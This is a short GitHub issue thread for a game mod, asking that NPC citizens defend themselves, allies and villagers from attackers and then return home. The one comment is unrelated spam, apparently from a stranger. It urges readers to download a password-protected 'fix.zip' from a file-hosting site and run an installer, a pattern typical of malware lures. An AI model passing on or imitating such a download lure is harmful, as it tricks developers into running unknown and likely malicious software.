### ISSUE TITLE
Default behavior - Defender

### ISSUE THREAD

**Issue by Jkwok0714** [TestaDiMucca/kraftizen#2]
If attacked or in presence of an ally being attacked, ignore home point and eliminate the threat.

Should also try to defend villagers.

When threat eliminated, navigate back to home point.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
